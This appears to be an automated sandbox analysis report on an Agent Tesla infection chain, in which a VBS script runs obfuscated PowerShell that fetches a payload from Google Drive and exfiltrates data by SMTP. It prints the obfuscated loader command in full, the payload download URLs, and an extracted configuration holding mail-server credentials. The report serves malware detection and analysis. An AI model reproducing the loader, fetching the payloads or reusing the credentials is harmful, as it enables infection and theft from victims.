MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(R
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", ProcessId: 6764, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(R
No Snort rule has matched


AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: cmd.exe.5480.5.memstrmin; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
Source: unknown; HTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1999089456.0000000007459000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1991407968.0000000002D38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2004519989.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdbF source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb#j source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: newfile.exe

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.4:49740 -> 114.142.162.17:26
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox View IP Address: 208.95.112.1
            Source: Joe Sandbox View IP Address: 114.142.162.17
            Source: Joe Sandbox View ASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cash4cars.nz
            Source: powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0R
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
            Source: wab.exe, 00000009.00000002.2943582396.0000000007242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunFP
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunFXR~l
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: wab.exe, 00000009.00000003.1980141801.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download
            Source: wab.exe, 00000009.00000003.1980141801.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=downloadgo
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D448E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443

            System Summary

            Source: amsi64_6912.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_6208.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6208, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7215
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7215
            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B89CED6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B89DC82
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0257E0E7
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0257E758
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_02574AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_02573EB8
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0257EFE8
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_02574200
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00621C5C
